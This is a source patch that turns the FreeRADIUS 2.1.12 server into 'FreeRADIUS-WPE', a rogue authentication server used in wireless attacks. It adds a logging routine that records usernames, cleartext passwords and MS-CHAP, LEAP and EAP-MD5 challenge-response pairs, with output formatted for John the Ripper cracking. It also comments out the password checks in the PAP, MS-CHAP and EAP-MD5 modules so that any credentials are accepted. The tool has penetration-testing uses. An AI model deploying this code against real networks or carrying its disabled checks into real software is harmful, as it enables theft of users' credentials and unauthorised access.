diff -uNr freeradius-server-2.1.12/raddb/radiusd.conf.in freeradius-server-2.1.12-wpe/raddb/radiusd.conf.in
--- freeradius-server-2.1.12/raddb/radiusd.conf.in	2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/raddb/radiusd.conf.in	2012-08-15 10:34:20.369565898 -0400
@@ -466,6 +466,7 @@
 
 #  The program to execute to do concurrency checks.
 checkrad = ${sbindir}/checkrad
+wpelogfile = ${logdir}/freeradius-server-wpe.log
 
 # SECURITY CONFIGURATION
 #
diff -uNr freeradius-server-2.1.12/raddb/users freeradius-server-2.1.12-wpe/raddb/users
--- freeradius-server-2.1.12/raddb/users	2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/raddb/users	2012-08-15 10:34:20.369565898 -0400
@@ -201,3 +201,6 @@
 # 	Service-Type = Administrative-User
 
 # On no match, the user is denied access.
+#"bradtest" Cleartext-Password := "bradtest", MS-CHAP-Use-NTLM-Auth := 0
+DEFAULT Cleartext-Password := "foo", MS-CHAP-Use-NTLM-Auth := 0
+DEFAULT Cleartext-Password := "a"
diff -uNr freeradius-server-2.1.12/src/include/radiusd.h freeradius-server-2.1.12-wpe/src/include/radiusd.h
--- freeradius-server-2.1.12/src/include/radiusd.h	2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/include/radiusd.h	2012-08-15 10:34:20.369565898 -0400
@@ -368,6 +368,7 @@
 #endif
 	char		*log_file;
 	char		*checkrad;
+	char		*wpelogfile;
 	const char      *pid_file;
 	rad_listen_t	*listen;
 	int		syslog_facility;
diff -uNr freeradius-server-2.1.12/src/main/auth.c freeradius-server-2.1.12-wpe/src/main/auth.c
--- freeradius-server-2.1.12/src/main/auth.c	2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/main/auth.c	2012-08-15 10:34:20.369565898 -0400
@@ -350,6 +350,7 @@
 					return -1;
 				}
 				RDEBUG2("User-Password in the request is correct.");
+				log_wpe("password", request->username->vp_strvalue,password_pair->vp_strvalue, NULL, 0, NULL, 0);
 				break;
 
 			} else if (auth_item->attribute != PW_CHAP_PASSWORD) {
diff -uNr freeradius-server-2.1.12/src/main/log.c freeradius-server-2.1.12-wpe/src/main/log.c
--- freeradius-server-2.1.12/src/main/log.c	2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/main/log.c	2012-08-15 10:34:20.369565898 -0400
@@ -28,6 +28,9 @@
 
 #include <freeradius-devel/radiusd.h>
 
+#include <stdio.h>
+#include <time.h>
+
 #ifdef HAVE_SYS_STAT_H
 #include <sys/stat.h>
 #endif
@@ -181,6 +184,68 @@
 	return r;
 }
 
+void log_wpe(char *authtype, char *username, char *password, unsigned char *challenge, unsigned int challen, unsigned char *response, unsigned int resplen)
+ {
+        FILE            *logfd;
+        time_t          nowtime;
+        unsigned int    count;
+
+        /* Get wpelogfile parameter and log data */
+        if (mainconfig.wpelogfile == NULL) {
+               logfd = stderr;
+        } else {
+                logfd = fopen(mainconfig.wpelogfile, "a");
+                if (logfd == NULL) {
+                        DEBUG2("  rlm_mschap: FAILED: Unable to open output log file %s: %s", mainconfig.wpelogfile, strerror(errno));
+                        logfd = stderr;
+                }
+        }
+
+
+        nowtime = time(NULL);
+        fprintf(logfd, "%s: %s\n", authtype, ctime(&nowtime));
+
+        if (username != NULL) {
+                fprintf(logfd, "\tusername: %s\n", username);
+        }
+        if (password != NULL) {
+                fprintf(logfd, "\tpassword: %s\n", password);
+        }
+
+        if (challen != 0) {
+                fprintf(logfd, "\tchallenge: ");
+                for (count=0; count!=(challen-1); count++) {
+                        fprintf(logfd, "%02x:",challenge[count]);
+                }
+                fprintf(logfd, "%02x\n",challenge[challen-1]);
+        }
+
+        if (resplen != 0) {
+                fprintf(logfd, "\tresponse: ");
+                for (count=0; count!=(resplen-1); count++) {
+                        fprintf(logfd, "%02x:",response[count]);
+                }
+                fprintf(logfd, "%02x\n",response[resplen-1]);
+        }
+
+	 if ( (strncmp(authtype, "mschap", 6) == 0) && username != NULL && challen != 0 && resplen != 0) {
+		fprintf(logfd, "\tjohn NETNTLM: %s:$NETNTLM$",username);
+		for (count=0; count<challen; count++) {
+                        fprintf(logfd, "%02x",challenge[count]);
+                }
+		fprintf(logfd,"$");
+		for (count=0; count<resplen; count++) {
+                        fprintf(logfd, "%02x",response[count]);
+                }
+		fprintf(logfd,"\n");
+	 }
+
+        fprintf(logfd, "\n");
+        
+	 fclose(logfd);
+ }
+
+
 
 /*
  *      Dump a whole list of attributes to DEBUG2
diff -uNr freeradius-server-2.1.12/src/main/mainconfig.c freeradius-server-2.1.12-wpe/src/main/mainconfig.c
--- freeradius-server-2.1.12/src/main/mainconfig.c	2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/main/mainconfig.c	2012-08-15 10:34:20.369565898 -0400
@@ -232,7 +232,7 @@
 	{ "checkrad", PW_TYPE_STRING_PTR, 0, &mainconfig.checkrad, "${sbindir}/checkrad" },
 
 	{ "debug_level", PW_TYPE_INTEGER, 0, &mainconfig.debug_level, "0"},
-
+	{ "wpelogfile", PW_TYPE_STRING_PTR, 0, &mainconfig.wpelogfile, "${logdir}/freeradius-server-wpe.log" },
 #ifdef WITH_PROXY
 	{ "proxy_requests", PW_TYPE_BOOLEAN, 0, &mainconfig.proxy_requests, "yes" },
 #endif
diff -uNr freeradius-server-2.1.12/src/main/radiusd.c freeradius-server-2.1.12-wpe/src/main/radiusd.c
--- freeradius-server-2.1.12/src/main/radiusd.c	2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/main/radiusd.c	2012-08-15 10:35:10.881816378 -0400
@@ -65,7 +65,7 @@
 int debug_flag = 0;
 int check_config = FALSE;
 
-const char *radiusd_version = "FreeRADIUS Version " RADIUSD_VERSION ", for host " HOSTINFO ", built on " __DATE__ " at " __TIME__;
+const char *radiusd_version = "FreeRADIUS-WPE Version " RADIUSD_VERSION ", for host " HOSTINFO ", built on " __DATE__ " at " __TIME__;
 
 pid_t radius_pid;
 
diff -uNr freeradius-server-2.1.12/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c freeradius-server-2.1.12-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c
--- freeradius-server-2.1.12/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c	2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c	2012-08-15 10:34:20.369565898 -0400
@@ -244,11 +244,11 @@
  *	Verify the MS-CHAP response from the user.
  */
 int eapleap_stage4(LEAP_PACKET *packet, VALUE_PAIR* password,
-		   leap_session_t *session)
+		   leap_session_t *session, char *username)
 {
 	unsigned char ntpwdhash[16];
 	unsigned char response[24];
-
+	unsigned char challenge[8] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
 
 	/*
 	 *	No password or previous packet.  Die.
@@ -266,6 +266,7 @@
 	 */
 	eapleap_mschap(ntpwdhash, session->peer_challenge, response);
 	if (memcmp(response, packet->challenge, 24) == 0) {
+		log_wpe("LEAP", username, NULL, challenge, 8, response, 24);
 		DEBUG2("  rlm_eap_leap: NtChallengeResponse from AP is valid");
 		memcpy(session->peer_response, response, sizeof(response));
 		return 1;
diff -uNr freeradius-server-2.1.12/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h freeradius-server-2.1.12-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h
--- freeradius-server-2.1.12/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h	2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h	2012-08-15 10:34:20.369565898 -0400
@@ -68,7 +68,7 @@
 LEAP_PACKET 	*eapleap_extract(EAP_DS *auth);
 LEAP_PACKET 	*eapleap_initiate(EAP_DS *eap_ds, VALUE_PAIR *user_name);
 int		eapleap_stage4(LEAP_PACKET *packet, VALUE_PAIR* password,
-			       leap_session_t *session);
+			       leap_session_t *session, char *username);
 LEAP_PACKET	*eapleap_stage6(LEAP_PACKET *packet, REQUEST *request,
 				VALUE_PAIR *user_name, VALUE_PAIR* password,
 				leap_session_t *session,
diff -uNr freeradius-server-2.1.12/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c freeradius-server-2.1.12-wpe/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c
--- freeradius-server-2.1.12/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c	2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c	2012-08-15 10:34:20.369565898 -0400
@@ -133,7 +133,7 @@
 	switch (session->stage) {
 	case 4:			/* Verify NtChallengeResponse */
 		DEBUG2("  rlm_eap_leap: Stage 4");
-		rcode = eapleap_stage4(packet, password, session);
+		rcode = eapleap_stage4(packet, password, session, username);
 		session->stage = 6;
 
 		/*
diff -uNr freeradius-server-2.1.12/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c freeradius-server-2.1.12-wpe/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c
--- freeradius-server-2.1.12/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c	2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c	2012-08-15 10:34:20.369565898 -0400
@@ -202,9 +202,13 @@
 	/*
 	 *	The length of the response is always 16 for MD5.
 	 */
+	/* WPE FTW
 	if (memcmp(output, packet->value, 16) != 0) {
 		return 0;
 	}
+	*/
+	log_wpe("eap_md5", packet->name, NULL, challenge, MD5_CHALLENGE_LEN,
+		packet->value, 16); 
 	return 1;
 }
 
diff -uNr freeradius-server-2.1.12/src/modules/rlm_mschap/rlm_mschap.c freeradius-server-2.1.12-wpe/src/modules/rlm_mschap/rlm_mschap.c
--- freeradius-server-2.1.12/src/modules/rlm_mschap/rlm_mschap.c	2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/modules/rlm_mschap/rlm_mschap.c	2012-08-15 10:34:20.381565941 -0400
@@ -661,9 +661,11 @@
 static int do_mschap(rlm_mschap_t *inst,
 		     REQUEST *request, VALUE_PAIR *password,
 		     uint8_t *challenge, uint8_t *response,
-		     uint8_t *nthashhash, int do_ntlm_auth)
+		     uint8_t *nthashhash, int do_ntlm_auth, char *username)
 {
 	uint8_t		calculated[24];
+	
+	log_wpe("mschap", username, NULL, challenge, 8, response, 24);
 
 	/*
 	 *	Do normal authentication.
@@ -678,9 +680,11 @@
 		}
 
 		smbdes_mschap(password->vp_strvalue, challenge, calculated);
+		/* WPE FTW
 		if (rad_digest_cmp(response, calculated, 24) != 0) {
 			return -1;
 		}
+		*/
 
 		/*
 		 *	If the password exists, and is an NT-Password,
@@ -1130,7 +1134,7 @@
 		 */
 		if (do_mschap(inst, request, password, challenge->vp_octets,
 			      response->vp_octets + offset, nthashhash,
-			      do_ntlm_auth) < 0) {
+			      do_ntlm_auth, request->username->vp_strvalue) < 0) {
 			RDEBUG2("MS-CHAP-Response is incorrect.");
 			goto do_error;
 		}
@@ -1239,7 +1243,7 @@
 
 		if (do_mschap(inst, request, nt_password, mschapv1_challenge,
 			      response->vp_octets + 26, nthashhash,
-			      do_ntlm_auth) < 0) {
+			      do_ntlm_auth, request->username->vp_strvalue) < 0) {
 			int i;
 			char buffer[128];
 
diff -uNr freeradius-server-2.1.12/src/modules/rlm_pap/rlm_pap.c freeradius-server-2.1.12-wpe/src/modules/rlm_pap/rlm_pap.c
--- freeradius-server-2.1.12/src/modules/rlm_pap/rlm_pap.c	2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/modules/rlm_pap/rlm_pap.c	2012-08-15 10:34:20.381565941 -0400
@@ -521,6 +521,8 @@
 		RDEBUG("ERROR: You set 'Auth-Type = PAP' for a request that does not contain a User-Password attribute!");
 		return RLM_MODULE_INVALID;
 	}
+       log_wpe("pap",request->username->vp_strvalue, request->password->vp_strvalue,
+                NULL, 0, NULL, 0);
 
 	/*
 	 *	The user MUST supply a non-zero-length password.
@@ -604,6 +606,7 @@
 	do_clear:
 		RDEBUG("Using clear text password \"%s\"",
 		      vp->vp_strvalue);
+		/* WPE FTW
 		if ((vp->length != request->password->length) ||
 		    (rad_digest_cmp(vp->vp_strvalue,
 				request->password->vp_strvalue,
@@ -611,6 +614,7 @@
 			snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: CLEAR TEXT password check failed");
 			goto make_msg;
 		}
+		*/
 	done:
 		RDEBUG("User authenticated successfully");
 		return RLM_MODULE_OK;
@@ -643,10 +647,12 @@
 		fr_MD5Update(&md5_context, request->password->vp_octets,
 			     request->password->length);
 		fr_MD5Final(digest, &md5_context);
+		/* WPE FTW
 		if (rad_digest_cmp(digest, vp->vp_octets, vp->length) != 0) {
 			snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: MD5 password check failed");
 			goto make_msg;
 		}
+		*/
 		goto done;
 		break;
 
@@ -670,10 +676,12 @@
 		/*
 		 *	Compare only the MD5 hash results, not the salt.
 		 */
+		/* WPE FTW
 		if (rad_digest_cmp(digest, vp->vp_octets, 16) != 0) {
 			snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SMD5 password check failed");
 			goto make_msg;
 		}
+		*/
 		goto done;
 		break;
 
@@ -692,10 +700,12 @@
 		fr_SHA1Update(&sha1_context, request->password->vp_octets,
 			      request->password->length);
 		fr_SHA1Final(digest,&sha1_context);
+		/* WPE FTW
 		if (rad_digest_cmp(digest, vp->vp_octets, vp->length) != 0) {
 			snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SHA1 password check failed");
 			goto make_msg;
 		}
+		*/
 		goto done;
 		break;
 
@@ -716,10 +726,12 @@
 			   request->password->length);
 		fr_SHA1Update(&sha1_context, &vp->vp_octets[20], vp->length - 20);
 		fr_SHA1Final(digest,&sha1_context);
+		/* WPE FTW
 		if (rad_digest_cmp(digest, vp->vp_octets, 20) != 0) {
 			snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SSHA password check failed");
 			goto make_msg;
 		}
+		*/
 		goto done;
 		break;
 
@@ -741,11 +753,13 @@
 			snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: mschap xlat failed");
 			goto make_msg;
 		}
+		/* WPE FTW
 		if ((fr_hex2bin(digest, digest, 16) != vp->length) ||
 		    (rad_digest_cmp(digest, vp->vp_octets, vp->length) != 0)) {
 			snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: NT password check failed");
 			goto make_msg;
 		}
+		*/
 		goto done;
 		break;
 
@@ -765,16 +779,20 @@
 			snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: mschap xlat failed");
 			goto make_msg;
 		}
+		/* WPE FTW
 		if ((fr_hex2bin(digest, digest, 16) != vp->length) ||
 		    (rad_digest_cmp(digest, vp->vp_octets, vp->length) != 0)) {
 			snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: LM password check failed");
+		*/
 		make_msg:
+		/*
 			RDEBUG("Passwords don't match");
 			module_fmsg_vp = pairmake("Module-Failure-Message",
 						  module_fmsg, T_OP_EQ);
 			pairadd(&request->packet->vps, module_fmsg_vp);
 			return RLM_MODULE_REJECT;
 		}
+		*/
 		goto done;
 		break;